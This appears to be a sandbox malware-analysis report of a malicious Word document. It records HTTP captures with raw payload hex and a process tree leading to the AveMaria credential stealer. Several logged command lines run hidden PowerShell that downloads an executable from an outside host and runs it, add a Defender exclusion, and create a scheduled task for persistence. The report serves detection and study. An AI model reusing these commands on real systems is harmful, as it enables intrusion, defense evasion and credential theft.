Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:13:01.840199947 CEST	0	OUT	GET /AwOgYiWG/explorer.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: login.929389.ankura.us Connection: Keep-Alive
Sep 23, 2022 08:13:01.870949984 CEST	0	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Date: Fri, 23 Sep 2022 06:13:01 GMT Transfer-Encoding: chunked
Sep 23, 2022 08:13:01.870994091 CEST	2	IN	Data Raw: 38 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c Data Ascii: 8000MZ@!L!This program cannot be run in DOS mode.$PELMP0 @ @@
Sep 23, 2022 08:13:01.871066093 CEST	3	IN	Data Raw: 24 00 00 0a 6f 25 00 00 0a 00 02 7b 05 00 00 04 72 1b 01 00 70 6f 26 00 00 0a 00 02 7b 05 00 00 04 1f 70 1f 26 73 27 00 00 0a 6f 28 00 00 0a 00 02 7b 05 00 00 04 18 6f 29 00 00 0a 00 02 7b 05 00 00 04 72 31 01 00 70 6f 2a 00 00 0a 00 02 7b 05 00 Data Ascii: $o%{rpo&{p&s'o({o){r1po{o+{s,o-{ s$o%{rCpo&{p&s'o({o){rQpo{o+{s,o-
Sep 23, 2022 08:13:01.871141911 CEST	5	IN	Data Raw: 00 11 00 02 7b 0c 00 00 04 02 7b 13 00 00 04 6f 17 00 00 0a 02 7b 14 00 00 04 6f 17 00 00 0a 6f 7e 00 00 06 80 0d 00 00 04 7e 0d 00 00 04 72 01 00 00 70 28 18 00 00 0a 0a 06 2c 23 00 72 95 02 00 70 28 1a 00 00 0a 26 73 3d 00 00 06 0b 07 6f 15 00 Data Ascii: {{o{oo~~rp(,#rp(&s=o(+rp(&0so0+,{+,{o(*0#s}s}s}s
Sep 23, 2022 08:13:01.871172905 CEST	5	IN	Data Raw: 00 00 0a 28 31 00 00 0a 00 02 28 32 00 00 0a 02 7b 17 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 16 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 15 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 14 00 00 04 6f 33 00 00 0a 00 02 Data Ascii: (1(2{o3(2{o3(2{o3(2{o3
Sep 23, 2022 08:13:01.871212959 CEST	6	IN	Data Raw: 28 32 00 00 0a 02 7b 13 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 12 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 11 00 00 04 6f 33 00 00 0a 00 02 72 65 03 00 70 28 26 00 00 0a 00 02 72 77 03 00 70 6f 2a 00 00 0a 00 02 16 28 34 00 Data Ascii: (2{o3(2{o3(2{o3rep(&rwpo(4(5o6rp(&(<(*0 F(T+<+"((X-XX -
Sep 23, 2022 08:13:01.871256113 CEST	8	IN	Data Raw: 00 0a 6f 2a 00 00 0a 00 2a 00 00 00 13 30 05 00 50 01 00 00 0c 00 00 11 00 02 7b 1c 00 00 04 6f 42 00 00 0a 02 7b 28 00 00 04 6f 4a 00 00 0a 13 05 12 05 28 4b 00 00 0a 28 4c 00 00 0a 6f 43 00 00 0a 72 b5 03 00 70 6f 44 00 00 0a 6f 46 00 00 0a 0a Data Ascii: o**0P{oB{(oJ(K(LoCrpoDoF{oB{ oJ(K(LoCrpoDoF{&oM{'oM(N(O9rp(, rp(,(P&(P&+
Sep 23, 2022 08:13:01.871296883 CEST	9	IN	Data Raw: 6f 63 00 00 0a 00 02 7b 2f 00 00 04 1c 6f 64 00 00 0a 00 02 7b 2f 00 00 04 72 0d 06 00 70 6f 65 00 00 0a 00 02 7b 2f 00 00 04 1f 7d 6f 66 00 00 0a 00 02 7b 30 00 00 04 72 8f 03 00 70 6f 62 00 00 0a 00 02 7b 30 00 00 04 72 1d 06 00 70 6f 63 00 00 Data Ascii: oc{/od{/rpoe{/}of{0rpob{0rpoc{0od{0r+poe{0}of{1r;pob{1rYpoc{1od{1r}poe{1 of{2rpob{2rpoc
Sep 23, 2022 08:13:01.871339083 CEST	10	IN	Data Raw: 00 00 0a 00 02 7b 26 00 00 04 18 6f 69 00 00 0a 00 02 7b 26 00 00 04 20 95 02 00 00 1f 50 73 24 00 00 0a 6f 25 00 00 0a 00 02 7b 26 00 00 04 72 f3 07 00 70 6f 26 00 00 0a 00 02 7b 26 00 00 04 20 33 01 00 00 1f 1a 73 27 00 00 0a 6f 28 00 00 0a 00 Data Ascii: {&oi{& Ps$o%{&rpo&{& 3s'o({&o){'rp" As"o#{'oi{' s$o%{'rpo&{' 3s'o({'o){(rp" As"
Sep 23, 2022 08:13:01.871407986 CEST	12	IN	Data Raw: 00 00 04 72 b5 00 00 70 22 00 00 40 41 17 19 16 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 37 00 00 04 20 27 02 00 00 1f 1a 73 24 00 00 0a 6f 25 00 00 0a 00 02 7b 37 00 00 04 72 e1 08 00 70 6f 26 00 00 0a 00 02 7b 37 00 00 04 1f 67 1f 19 73 27 00 00 Data Ascii: rp"@As"o#{7 's$o%{7rpo&{7gs'o({7o){7rpo*"A"As.(/(0 Ts'(1(2{7o3(2{6o3(2{-o3(2{,o3
Sep 23, 2022 08:13:01.903110981 CEST	13	IN	Data Raw: 00 00 04 6f 17 00 00 0a 72 01 00 00 70 28 18 00 00 0a 2b 01 16 0a 06 39 84 00 00 00 00 02 7b 38 00 00 04 02 7b 39 00 00 04 02 7b 41 00 00 04 6f 17 00 00 0a 02 7b 42 00 00 04 6f 17 00 00 0a 02 7b 44 00 00 04 6f 17 00 00 0a 02 7b 43 00 00 04 6f 17 Data Ascii: orp(+9{8{9{Ao{Bo{Do{Co{Eoo,'rp(&{;{8ooH+rp(&+r#p(&{;{8{SoooH0s=o(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	159.223.2.212	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:13:08.820766926 CEST	1038	OUT	GET /AwOgYiWG/explorer.exe HTTP/1.1 Host: login.929389.ankura.us Connection: Keep-Alive
Sep 23, 2022 08:13:08.845700026 CEST	1038	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Date: Fri, 23 Sep 2022 06:13:08 GMT Transfer-Encoding: chunked
Sep 23, 2022 08:13:08.845768929 CEST	1040	IN	Data Raw: 38 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c Data Ascii: 8000MZ@!L!This program cannot be run in DOS mode.$PELMP0 @ @@
Sep 23, 2022 08:13:08.845818043 CEST	1041	IN	Data Raw: 24 00 00 0a 6f 25 00 00 0a 00 02 7b 05 00 00 04 72 1b 01 00 70 6f 26 00 00 0a 00 02 7b 05 00 00 04 1f 70 1f 26 73 27 00 00 0a 6f 28 00 00 0a 00 02 7b 05 00 00 04 18 6f 29 00 00 0a 00 02 7b 05 00 00 04 72 31 01 00 70 6f 2a 00 00 0a 00 02 7b 05 00 Data Ascii: $o%{rpo&{p&s'o({o){r1po{o+{s,o-{ s$o%{rCpo&{p&s'o({o){rQpo{o+{s,o-
Sep 23, 2022 08:13:08.845884085 CEST	1042	IN	Data Raw: 00 11 00 02 7b 0c 00 00 04 02 7b 13 00 00 04 6f 17 00 00 0a 02 7b 14 00 00 04 6f 17 00 00 0a 6f 7e 00 00 06 80 0d 00 00 04 7e 0d 00 00 04 72 01 00 00 70 28 18 00 00 0a 0a 06 2c 23 00 72 95 02 00 70 28 1a 00 00 0a 26 73 3d 00 00 06 0b 07 6f 15 00 Data Ascii: {{o{oo~~rp(,#rp(&s=o(+rp(&0so0+,{+,{o(*0#s}s}s}s
Sep 23, 2022 08:13:08.845925093 CEST	1042	IN	Data Raw: 00 00 0a 28 31 00 00 0a 00 02 28 32 00 00 0a 02 7b 17 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 16 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 15 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 14 00 00 04 6f 33 00 00 0a 00 02 Data Ascii: (1(2{o3(2{o3(2{o3(2{o3
Sep 23, 2022 08:13:08.845994949 CEST	1044	IN	Data Raw: 28 32 00 00 0a 02 7b 13 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 12 00 00 04 6f 33 00 00 0a 00 02 28 32 00 00 0a 02 7b 11 00 00 04 6f 33 00 00 0a 00 02 72 65 03 00 70 28 26 00 00 0a 00 02 72 77 03 00 70 6f 2a 00 00 0a 00 02 16 28 34 00 Data Ascii: (2{o3(2{o3(2{o3rep(&rwpo(4(5o6rp(&(<(*0 F(T+<+"((X-XX -
Sep 23, 2022 08:13:08.846045971 CEST	1045	IN	Data Raw: 00 0a 6f 2a 00 00 0a 00 2a 00 00 00 13 30 05 00 50 01 00 00 0c 00 00 11 00 02 7b 1c 00 00 04 6f 42 00 00 0a 02 7b 28 00 00 04 6f 4a 00 00 0a 13 05 12 05 28 4b 00 00 0a 28 4c 00 00 0a 6f 43 00 00 0a 72 b5 03 00 70 6f 44 00 00 0a 6f 46 00 00 0a 0a Data Ascii: o**0P{oB{(oJ(K(LoCrpoDoF{oB{ oJ(K(LoCrpoDoF{&oM{'oM(N(O9rp(, rp(,(P&(P&+
Sep 23, 2022 08:13:08.846096039 CEST	1047	IN	Data Raw: 6f 63 00 00 0a 00 02 7b 2f 00 00 04 1c 6f 64 00 00 0a 00 02 7b 2f 00 00 04 72 0d 06 00 70 6f 65 00 00 0a 00 02 7b 2f 00 00 04 1f 7d 6f 66 00 00 0a 00 02 7b 30 00 00 04 72 8f 03 00 70 6f 62 00 00 0a 00 02 7b 30 00 00 04 72 1d 06 00 70 6f 63 00 00 Data Ascii: oc{/od{/rpoe{/}of{0rpob{0rpoc{0od{0r+poe{0}of{1r;pob{1rYpoc{1od{1r}poe{1 of{2rpob{2rpoc
Sep 23, 2022 08:13:08.846148014 CEST	1048	IN	Data Raw: 00 00 0a 00 02 7b 26 00 00 04 18 6f 69 00 00 0a 00 02 7b 26 00 00 04 20 95 02 00 00 1f 50 73 24 00 00 0a 6f 25 00 00 0a 00 02 7b 26 00 00 04 72 f3 07 00 70 6f 26 00 00 0a 00 02 7b 26 00 00 04 20 33 01 00 00 1f 1a 73 27 00 00 0a 6f 28 00 00 0a 00 Data Ascii: {&oi{& Ps$o%{&rpo&{& 3s'o({&o){'rp" As"o#{'oi{' s$o%{'rpo&{' 3s'o({'o){(rp" As"
Sep 23, 2022 08:13:08.846199036 CEST	1049	IN	Data Raw: 00 00 04 72 b5 00 00 70 22 00 00 40 41 17 19 16 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 37 00 00 04 20 27 02 00 00 1f 1a 73 24 00 00 0a 6f 25 00 00 0a 00 02 7b 37 00 00 04 72 e1 08 00 70 6f 26 00 00 0a 00 02 7b 37 00 00 04 1f 67 1f 19 73 27 00 00 Data Ascii: rp"@As"o#{7 's$o%{7rpo&{7gs'o({7o){7rpo*"A"As.(/(0 Ts'(1(2{7o3(2{6o3(2{-o3(2{,o3
Sep 23, 2022 08:13:08.870817900 CEST	1051	IN	Data Raw: 00 00 04 6f 17 00 00 0a 72 01 00 00 70 28 18 00 00 0a 2b 01 16 0a 06 39 84 00 00 00 00 02 7b 38 00 00 04 02 7b 39 00 00 04 02 7b 41 00 00 04 6f 17 00 00 0a 02 7b 42 00 00 04 6f 17 00 00 0a 02 7b 44 00 00 04 6f 17 00 00 0a 02 7b 43 00 00 04 6f 17 Data Ascii: orp(+9{8{9{Ao{Bo{Do{Co{Eoo,'rp(&{;{8ooH+rp(&+r#p(&{;{8{SoooH0s=o(

Target ID:	0
Start time:	08:13:11
Start date:	23/09/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f2d0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	08:13:17
Start date:	23/09/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Imagebase:	0x13f8e0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	08:13:30
Start date:	23/09/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x4a7a0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	08:13:31
Start date:	23/09/2022
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x1330000
File size:	974336 bytes
MD5 hash:	87B246B26208A9831A4372664C518C2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Target ID:	9
Start time:	08:13:31
Start date:	23/09/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Imagebase:	0x13ffc0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: powershell.exePID: 2580, Parent PID: 2360

General

Target ID:	11
Start time:	08:13:37
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Imagebase:	0x223f0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	08:13:38
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Imagebase:	0x880000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	15
Start time:	08:13:41
Start date:	23/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x1020000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	16
Start time:	08:13:42
Start date:	23/09/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x4a7a0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: MSBuild.exePID: 2040, Parent PID: 2360

General

Target ID:	17
Start time:	08:13:42
Start date:	23/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x1020000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Target ID:	19
Start time:	08:13:42
Start date:	23/09/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Imagebase:	0x13f260000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

Analysis Process: explorer.exePID: 676, Parent PID: 2540

General

Target ID:	20
Start time:	08:13:42
Start date:	23/09/2022
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x1330000
File size:	974336 bytes
MD5 hash:	87B246B26208A9831A4372664C518C2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Target ID:	22
Start time:	08:13:47
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Imagebase:	0x223b0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: schtasks.exePID: 2172, Parent PID: 676

General

Target ID:	24
Start time:	08:13:48
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Imagebase:	0xfe0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	26
Start time:	08:13:52
Start date:	23/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x1020000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	27
Start time:	08:14:03
Start date:	23/09/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x4a7a0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
